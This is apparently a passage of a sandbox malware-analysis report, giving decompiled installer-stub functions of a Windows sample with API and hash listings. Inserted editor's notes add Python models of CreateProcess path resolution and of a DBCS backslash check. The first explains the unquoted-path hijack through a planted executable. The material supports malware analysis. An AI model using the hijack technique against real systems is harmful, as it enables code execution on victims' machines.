                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: AttributesCloseCreateFileHandleProcess
                                                                          • String ID: Error launching installer
                                                                          • API String ID: 2000254098-66219284
                                                                          • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                          • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
                                                                          • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                          • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
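Editor's note on E00405247 (added here; not part of the analysis report): the function sets cb = 0x44 (the size of STARTUPINFOA) on the STARTUPINFO at 0x7a1588, accepts _a8 as lpCurrentDirectory only if GetFileAttributesA succeeds and reports FILE_ATTRIBUTE_DIRECTORY (0x10), otherwise passes NULL, then calls CreateProcessA with lpApplicationName = NULL and the whole command line in _a4, closes the thread handle and returns the process handle. The caller listed above polls that handle with WaitForSingleObject(h, 100) until it stops returning WAIT_TIMEOUT (0x102) and reads the exit code with GetExitCodeProcess. With a NULL application name, Windows takes the executable from the first whitespace-delimited token of the command line and, when that path is unquoted and contains spaces, probes successively longer prefixes until a file exists. The Python below is an added model of that documented search order; it is not code from the sample or the report, it launches nothing, and the helper names and the planted-file set are hypothetical.

```python
"""Model of how CreateProcess selects the executable when lpApplicationName is NULL.

Added example for the E00405247 listing above; not code from the sample or the
analysis report. It models the search order documented for CreateProcess and
never launches anything. The `exists` callback stands in for the file-system
probe the loader performs (hypothetical helper, supplied by the caller).
"""
from __future__ import annotations

import ntpath
from typing import Callable, Optional


def first_token(cmdline: str) -> tuple[str, bool]:
    """Return (module name token, was_quoted) as CreateProcess reads it.

    A leading double quote delimits the module name; otherwise the token ends
    at the first whitespace character.
    """
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return (s[1:] if end == -1 else s[1:end]), True
    parts = s.split(None, 1)
    return (parts[0] if parts else ""), False


def with_exe(path: str) -> str:
    """CreateProcess appends .exe when the module name carries no extension."""
    return path if "." in ntpath.basename(path) else path + ".exe"


def createprocess_candidates(cmdline: str) -> list[str]:
    """Paths the loader probes, in order, for the module named by `cmdline`.

    Quoted module name: a single candidate. Unquoted: every whitespace-delimited
    prefix of the command line, shortest first, so
    C:\\Program Files\\Sub Dir\\app name.exe yields
    C:\\Program.exe, C:\\Program Files\\Sub.exe, C:\\Program Files\\Sub Dir\\app.exe, ...
    """
    token, quoted = first_token(cmdline)
    if quoted:
        return [with_exe(token)]
    words = cmdline.split()
    return [with_exe(" ".join(words[:i])) for i in range(1, len(words) + 1)]


def resolve_module(cmdline: str, exists: Callable[[str], bool]) -> Optional[str]:
    """First candidate for which `exists` is true, or None (CreateProcess would fail)."""
    for cand in createprocess_candidates(cmdline):
        if exists(cand):
            return cand
    return None


if __name__ == "__main__":
    # Constructed file system: a planted C:\Program.exe next to the real target.
    planted = {r"c:\program.exe", r"c:\program files\sub dir\app name.exe"}
    cmd = r"C:\Program Files\Sub Dir\app name.exe /S"
    print(createprocess_candidates(cmd))
    print("unquoted resolves to:", resolve_module(cmd, lambda p: p.lower() in planted))
    print("quoted resolves to:  ", resolve_module('"' + cmd[:-3] + '" /S',
                                                   lambda p: p.lower() in planted))
```

resolve_module returning C:\Program.exe for a command line that names C:\Program Files\Sub Dir\app name.exe is the classic unquoted-path hijack. It is a property of CreateProcess with a NULL application name, not something the report attributes to this sample; whether the command lines this stub passes in _a4 are quoted is not visible in the listing.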

                                                                          C-Code - Quality: 100%
                                                                          			E004054CC(CHAR* _a4) {
                                                                          				CHAR* _t7;
                                                                          
                                                                          				_t7 = _a4;
                                                                          				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                          					lstrcatA(_t7, 0x409010);
                                                                          				}
                                                                          				return _t7;
                                                                          			}

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
                                                                          • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2659869361-3916508600
                                                                          • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                          • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
                                                                          • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                          • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
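Editor's note on E004054CC (added here; not part of the analysis report): the function appends the string at 0x409010 (a single backslash, given the comparison against 0x5c) when the path's last character is not a backslash. It locates that last character with CharPrevA instead of indexing the final byte, which matters on double-byte ANSI code pages: the trail byte of a two-byte character can itself be 0x5c, so a naive last-byte test misreads such a path as already terminated and the separator is never appended. The Python below, an added example rather than the sample's code, shows both checks on a constructed Shift-JIS (cp932) path; the helper names are hypothetical.

```python
"""DBCS-aware trailing-backslash check for an ANSI (byte string) path.

Added example for the E004054CC listing above; not code from the sample or the
analysis report. It reproduces the effect of CharPrevA (inspect the last
character, not the last byte) in Python. The Shift-JIS sample path is constructed.
"""
from __future__ import annotations

BACKSLASH = 0x5C  # the byte value E004054CC compares against


def ends_with_backslash_naive(path: bytes) -> bool:
    """Last-byte test. Wrong on double-byte code pages: the trail byte of a
    two-byte character can be 0x5C, which this test mistakes for a separator."""
    return bool(path) and path[-1] == BACKSLASH


def ends_with_backslash_dbcs(path: bytes, codepage: str) -> bool:
    """Last-character test, which is what CharPrevA gives the caller.

    Decoding with the process ANSI code page resolves lead/trail byte pairs;
    an undecodable tail is treated as not-a-separator (errors="replace").
    """
    if not path:
        return False
    return path.decode(codepage, errors="replace")[-1] == "\\"


def add_trailing_backslash(path: bytes, codepage: str = "cp1252") -> bytes:
    """Return `path` terminated by a backslash, as E004054CC does.

    Like the original, an empty path becomes a lone backslash.
    """
    if not ends_with_backslash_dbcs(path, codepage):
        return path + b"\\"
    return path


if __name__ == "__main__":
    # Constructed: katakana SO (U+30BD) is 0x83 0x5C in Shift-JIS (cp932).
    so = "\u30bd".encode("cp932")
    p = b"C:\\Temp\\" + so
    print("naive says terminated:", ends_with_backslash_naive(p))
    print("cp932 says terminated:", ends_with_backslash_dbcs(p, "cp932"))
    print(add_trailing_backslash(p, "cp932"))
```

On a cp932 system the naive check leaves the constructed path C:\Temp\<0x83 0x5C> without a separator, so a file name concatenated onto it would land inside a different, non-existent directory name; the CharPrevA-style check appends the backslash. A sandbox or emulator that re-implements this stub's string handling with a last-byte test will diverge from the real binary on such paths.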

                                                                          C-Code - Quality: 85%
                                                                          			E00402386(void* __eax, void* __eflags) {
                                                                          				void* _t15;
                                                                          				char* _t18;
                                                                          				int _t19;
                                                                          				char _t24;
                                                                          				int _t27;
                                                                          				intOrPtr _t33;
                                                                          				void* _t35;
                                                                          
                                                                          				_t15 = E00402B61(__eax);
                                                                          				_t33 =  *((intOrPtr*)(_t35 - 0x14));
                                                                          				 *(_t35 - 0x30) =  *(_t35 - 0x10);
                                                                          				 *(_t35 - 0x44) = E00402A9A(2);
                                                                          				_t18 = E00402A9A(0x11);
                                                                          				 *(_t35 - 4) = 1;
                                                                          				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
                                                                          				if(_t19 == 0) {
                                                                          					if(_t33 == 1) {
                                                                          						E00402A9A(0x23);
                                                                          						_t19 = lstrlenA(0x40a418) + 1;
                                                                          					}
                                                                          					if(_t33 == 4) {
                                                                          						_t24 = E00402A7D(3);
                                                                          						 *0x40a418 = _t24;
                                                                          						_t19 = _t33;
                                                                          					}
                                                                          					if(_t33 == 3) {
                                                                          						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
                                                                          					}
                                                                          					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
                                                                          						 *(_t35 - 4) = _t27;
                                                                          					}
                                                                          					_push( *(_t35 + 8));
                                                                          					RegCloseKey();
                                                                          				}
                                                                          				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
                                                                          				return 0;
                                                                          			}

                                                                          APIs
                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                                                          • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: CloseCreateValuelstrlen
                                                                          • String ID:
                                                                          • API String ID: 1356686001-0
                                                                          • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                          • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
                                                                          • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                          • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 85%
                                                                          			E00401F4B(char __ebx, char* __edi, char* __esi) {
                                                                          				char* _t21;
                                                                          				int _t22;
                                                                          				void* _t33;
                                                                          
                                                                          				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
                                                                          				_t21 = E00402A9A(0xffffffee);
                                                                          				 *(_t33 - 0x2c) = _t21;
                                                                          				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
                                                                          				 *__esi = __ebx;
                                                                          				 *(_t33 - 8) = _t22;
                                                                          				 *__edi = __ebx;
                                                                          				 *((intOrPtr*)(_t33 - 4)) = 1;
                                                                          				if(_t22 != __ebx) {
                                                                          					__eax = GlobalAlloc(0x40, __eax);
                                                                          					 *(__ebp - 0x34) = __eax;
                                                                          					if(__eax != __ebx) {
                                                                          						if(__eax != 0) {
                                                                          							__ebp - 0x44 = __ebp + 8;
                                                                          							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
                                                                          								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
                                                                          								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
                                                                          								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                                          							}
                                                                          						}
                                                                          						_push( *(__ebp - 0x34));
                                                                          						GlobalFree();
                                                                          					}
                                                                          				}
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
                                                                          				return 0;
                                                                          			}

                                                                          APIs
                                                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                                                          • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                                                            • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                          • String ID:
                                                                          • API String ID: 1404258612-0
                                                                          • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                          • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
                                                                          • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                          • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 92%
                                                                          			E004021F6() {
                                                                          				void* __ebx;
                                                                          				char _t33;
                                                                          				CHAR* _t35;
                                                                          				CHAR* _t38;
                                                                          				void* _t40;
                                                                          
                                                                          				_t35 = E00402A9A(_t33);
                                                                          				 *(_t40 + 8) = _t35;
                                                                          				_t38 = E00402A9A(0x11);
                                                                          				 *(_t40 - 0x64) =  *(_t40 - 8);
                                                                          				 *((intOrPtr*)(_t40 - 0x60)) = 2;
                                                                          				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
                                                                          				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
                                                                          				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
                                                                          				lstrcatA(0x40a418, _t38);
                                                                          				 *(_t40 - 0x5c) =  *(_t40 + 8);
                                                                          				 *(_t40 - 0x58) = _t38;
                                                                          				 *(_t40 - 0x4a) = 0x40a418;
                                                                          				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
                                                                          				E00404D62(_t33, 0x40a418);
                                                                          				if(SHFileOperationA(_t40 - 0x64) != 0) {
                                                                          					E00404D62(0xfffffff9, _t33);
                                                                          					 *((intOrPtr*)(_t40 - 4)) = 1;
                                                                          				}
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
                                                                          				return 0;
                                                                          			}

                                                                          APIs
                                                                          • lstrlenA.KERNEL32 ref: 00402218
                                                                          • lstrlenA.KERNEL32(00000000), ref: 00402222
                                                                          • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                            • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                            • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                          • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                                                          • String ID:
                                                                          • API String ID: 3674637002-0
                                                                          • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                          • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
                                                                          • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                          • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0040555F(CHAR* _a4) {
                                                                          				CHAR* _t3;
                                                                          				char* _t5;
                                                                          				CHAR* _t7;
                                                                          				CHAR* _t8;
                                                                          				void* _t10;
                                                                          
                                                                          				_t8 = _a4;
                                                                          				_t7 = CharNextA(_t8);
                                                                          				_t3 = CharNextA(_t7);
                                                                          				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                                          					if( *_t8 != 0x5c5c) {
                                                                          						L8:
                                                                          						return 0;
                                                                          					}
                                                                          					_t10 = 2;
                                                                          					while(1) {
                                                                          						_t10 = _t10 - 1;
                                                                          						_t5 = E004054F7(_t3, 0x5c);
                                                                          						if( *_t5 == 0) {
                                                                          							goto L8;
                                                                          						}
                                                                          						_t3 = _t5 + 1;
                                                                          						if(_t10 != 0) {
                                                                          							continue;
                                                                          						}
                                                                          						return _t3;
                                                                          					}
                                                                          					goto L8;
                                                                          				} else {
                                                                          					return CharNextA(_t3);
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 0040556D
                                                                          • CharNextA.USER32(00000000), ref: 00405572
                                                                          • CharNextA.USER32(00000000), ref: 00405581
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CharNext
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 3213498283-3916508600
                                                                          • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                          • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
                                                                          • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                          • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 61%
                                                                          			E00401D8E() {
                                                                          				void* __esi;
                                                                          				int _t6;
                                                                          				signed char _t11;
                                                                          				struct HFONT__* _t14;
                                                                          				void* _t18;
                                                                          				void* _t24;
                                                                          				void* _t26;
                                                                          				void* _t28;
                                                                          
                                                                          				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                                                          				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
                                                                          				 *0x4093e8 = E00402A7D(3);
                                                                          				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                                          				 *0x4093ef = 1;
                                                                          				 *0x4093ec = _t11 & 0x00000001;
                                                                          				 *0x4093ed = _t11 & 0x00000002;
                                                                          				 *0x4093ee = _t11 & 0x00000004;
                                                                          				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
                                                                          				_t14 = CreateFontIndirectA(0x4093d8);
                                                                          				_push(_t14);
                                                                          				_push(_t26);
                                                                          				E0040591D();
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
                                                                          				return 0;
                                                                          			}

                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00401D95
                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                                                          • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirect
                                                                          • String ID:
                                                                          • API String ID: 3272661963-0
                                                                          • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                          • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
                                                                          • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                          • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                          				int _t19;
                                                                          				long _t23;
                                                                          
                                                                          				if(_a8 != 0x102) {
                                                                          					__eflags = _a8 - 2;
                                                                          					if(_a8 == 2) {
                                                                          						 *0x40929c =  *0x40929c | 0xffffffff;
                                                                          						__eflags =  *0x40929c;
                                                                          					}
                                                                          					__eflags = _a8 - 0x200;
                                                                          					if(_a8 != 0x200) {
                                                                          						_t23 = _a16;
                                                                          						goto L9;
                                                                          					} else {
                                                                          						_t19 = IsWindowVisible(_a4);
                                                                          						__eflags = _t19;
                                                                          						if(_t19 == 0) {
                                                                          							L12:
                                                                          							_t23 = _a16;
                                                                          							L13:
                                                                          							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
                                                                          						}
                                                                          						_t23 = E00404627(_a4, 1);
                                                                          						_a8 = 0x419;
                                                                          						L9:
                                                                          						__eflags = _a8 - 0x419;
                                                                          						if(_a8 == 0x419) {
                                                                          							__eflags =  *0x40929c - _t23; // 0xffffffff
                                                                          							if(__eflags != 0) {
                                                                          								 *0x40929c = _t23;
                                                                          								E004059BF(0x79f580, 0x7a4000);
                                                                          								E0040591D(0x7a4000, _t23);
                                                                          								E00401410(6);
                                                                          								E004059BF(0x7a4000, 0x79f580);
                                                                          							}
                                                                          						}
                                                                          						goto L13;
                                                                          					}
                                                                          				}
                                                                          				if(_a12 == 0x20) {
                                                                          					E00403DF3(0x413);
                                                                          					return 0;
                                                                          				}
                                                                          				goto L12;
                                                                          			}


                                                                          APIs
                                                                          • IsWindowVisible.USER32 ref: 00404CE8
                                                                          • CallWindowProcA.USER32 ref: 00404D56
                                                                            • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID:
                                                                          • API String ID: 3748168415-3916222277
                                                                          • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                          • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
                                                                          • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                          • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                          				int _t5;
                                                                          				long _t7;
                                                                          				struct _OVERLAPPED* _t11;
                                                                          				intOrPtr* _t15;
                                                                          				void* _t17;
                                                                          				int _t21;
                                                                          
                                                                          				_t15 = __esi;
